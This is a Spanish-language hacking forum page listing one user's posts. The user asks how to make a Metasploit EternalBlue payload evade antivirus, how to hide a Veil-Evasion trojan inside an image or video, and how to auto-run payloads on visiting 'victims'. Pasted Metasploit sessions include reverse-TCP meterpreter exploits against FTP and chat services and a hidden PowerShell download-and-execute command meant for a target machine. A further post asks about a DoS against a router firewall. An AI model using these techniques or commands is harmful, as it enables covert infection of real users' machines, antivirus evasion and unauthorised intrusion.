Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - RxB

#1
Hola a todos,
Quería rpeguntar si alguien sabe como hacer para que el antivirus no detecte el archivo eternal11.dll generado por {este exploit ya que cuando lo detecta interrumpe la conexión! Estuve viendo que metasploit tiene un encoder dentro de las opciones de éste exploit, pero no se bien como usarlo o como combinar los diferecntes encoders! Si alguine me puede ayudar se lo agradeceré!  Saludos!  :)

msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > show encoders

Compatible Encoders
===================

   Name                          Disclosure Date  Rank       Check  Description
   ----                          ---------------  ----       -----  -----------
   generic/eicar                                  manual     No     The EICAR Encoder
   generic/none                                   normal     No     The "none" Encoder
   x64/xor                                        normal     No     XOR Encoder
   x64/xor_dynamic                                normal     No     Dynamic key XOR Encoder
   x64/zutto_dekiru                               manual     No     Zutto Dekiru
   x86/add_sub                                    manual     No     Add/Sub Encoder
   x86/alpha_mixed                                low        No     Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                                low        No     Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_underscore_tolower                   manual     No     Avoid underscore/tolower
   x86/avoid_utf8_tolower                         manual     No     Avoid UTF8/tolower
   x86/bloxor                                     manual     No     BloXor - A Metamorphic Block Based XOR Encoder
   x86/bmp_polyglot                               manual     No     BMP Polyglot
   x86/call4_dword_xor                            normal     No     Call+4 Dword XOR Encoder
   x86/context_cpuid                              manual     No     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                               manual     No     stat(2)-based Context Keyed Payload Encoder
   x86/context_time                               manual     No     time(2)-based Context Keyed Payload Encoder
   x86/countdown                                  normal     No     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                                normal     No     Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive                          normal     No     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                                   low        No     Non-Alpha Encoder
   x86/nonupper                                   low        No     Non-Upper Encoder
   x86/opt_sub                                    manual     No     Sub Encoder (optimised)
   x86/service                                    manual     No     Register Service
   x86/shikata_ga_nai                             excellent  No     Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                          manual     No     Single Static Bit
   x86/unicode_mixed                              manual     No     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper                              manual     No     Alpha2 Alphanumeric Unicode Uppercase Encoder
   x86/xor_dynamic                                normal     No     Dynamic key XOR Encoder


#2
Dudas y pedidos generales / Ocultar Troyano
Octubre 25, 2015, 01:15:51 AM
Hola gente,

Utilizando Vail-Evasion generé un troyano indetectable a los AV en formato .exe. Quisiera saber que programa me recomiendan para fusionar éste ejecutable a otro archivo (por ejemplo una imagen o video), y que éste se pueda ejecutar en forma oculta al abrir dicho archivo.

Muchas gracias!
#3
Dudas y pedidos generales / Web_delivery
Octubre 17, 2015, 05:34:01 PM
Hola,

Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
  • Exploit running as background job.

  • Started HTTP reverse handler on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    msf exploit(web_delivery) >
  • Using URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Local IP: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
  • Server started.
  • Run the following command on the target machine:
    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

    Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:

    powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))

    Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.

    Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?

    Si alguien tiene alguna idea se lo agradezco!
#4
Hola, quería saber de que forma puedo ejecutar en forma automática un Payload desde mi servidor web sin que sea mediante java.
Por ejemplo, he creado un Payload con veil-evasion. Quisiera subirlo a mi web y en el momento en que la victima se conecte a ella se ejecute el Payload automáticamente.
#5
Dudas y pedidos generales / Exploit FreeFloat
Octubre 10, 2015, 09:51:13 PM
Hola Gente,

Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?



msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit
  • Exploit running as background job.

  • Started reverse handler on 192.168.1.102:4444
    msf exploit(freefloatftp_wbem) >
  • Server started.
  • 192.168.1.106:21 - Trying to upload SxofqwKjdO.exe
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
  • 192.168.1.106:21 - Trying to upload pvzBH.mof
  • 192.168.1.106:21 - Sending empty login...
  • 192.168.1.106:21 - Empty authentication was successful
  • 192.168.1.106:21 - Set binary mode
  • 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"

    msf exploit(freefloatftp_wbem) >
#6
Dudas y pedidos generales / Metasploitable 2 - Ayuda!
Octubre 07, 2015, 12:42:49 AM
Hola,

Tengo instalado en una máquina virtual Metasploitable 2. Realicé un escaneo de vulnerabilidades con Openvas desde Kali Linux. Encontré la siguiente vulnerabilidad:

Samba 'TALLOC_FREE()' Function Remote Code Execution Vulnerability
References

CVE:    CVE-2015-0240
BID:    72711
CERT:    DFN-CERT-2015-0253 , DFN-CERT-2015-0237
Other:    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
   No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargué el exploit adecuado para dicha vulnerabilidad:

#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya

Cuando lo ejecuto desde la terminal de Kali me dá el siguiente error:

root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -h
usage: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [-h] [-hs HEAP_START] [-pa PAYLOAD_ADDR]
                [-sps START_PAYLOAD_SIZE]
                target

Samba CVE-2015-0240 exploit

positional arguments:
  target                target IP address

optional arguments:
  -h, --help            show this help message and exit
  -hs HEAP_START, --heap_start HEAP_START
                        heap address in hex to start bruteforcing
  -pa PAYLOAD_ADDR, --payload_addr PAYLOAD_ADDR
                        exact payload (accountName) address in heap. If this
                        is defined, no heap bruteforcing
  -sps START_PAYLOAD_SIZE, --start_payload_size START_PAYLOAD_SIZE
                        start payload size for bruteforcing heap address in
                        KB. (128, 256, 512, ...)
root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 192.168.1.101
[-] seems not vulnerable
root@R:~/Descargas#

Alguien puede decirme que es lo que estoy haciendo mal?

Muchas gracias!
#7
Dudas y pedidos generales / Exploit TurboFTP_port
Octubre 04, 2015, 12:13:53 AM
Hola gente,

Tengo un servidor ftp vulnerable en una máquina virtual.

Cuando ejecuto el exploit desde metasploit me dá el siguiente error:

msf > use  exploit/windows/ftp/turboftp_port
msf exploit(turboftp_port) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(turboftp_port) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(turboftp_port) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(turboftp_port) > set LPORT 4444
LPORT => 4444
msf exploit(turboftp_port) > exploit

  • Started reverse handler on 192.168.1.102:4444
  • Automatically detecting the target
  • Selected Target: Automatic
    [-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
    msf exploit(turboftp_port) >

    Alguien puede ayudarme a resolverlo?

    Grs

#8
Hola, quería saber si hay forma de realizar en forma remota un ataque DoS al firewall del router y de esa manera poder escanear sus puertos sin que sean filtrados.
Si es que se puede agradecería un ejemplo.
#9
Ayuda! Tengo un host windows 7 vulnerable con su exploit (achat_bof), cuando lo ejecuto me dá el siguiente error,

msf exploit(achat_bof) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

alguién pude ayudarme y explicarme a que se debe! ??

Muchas gracias!
#10
Dudas y pedidos generales / Redireccionamiento de dominio
Septiembre 25, 2015, 01:54:51 AM
Quería saber si desde el router se puede redireccionar un dominio a otro. Es decir si yo escribo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta el router me redireccione a otra ip diferente.
#11
Hola a todos,

Estuve escaneando mi router con nmap desde mi red local y encontré el puerto 80 abierto con sus servicio, entre otros. Cuando hago el mismo escaneo desde internet el puerto 80 aparece filtrado por el firewall del router.
hay alguna manera de escanear mi router desde internet y ver que servicios corren en cada puerto?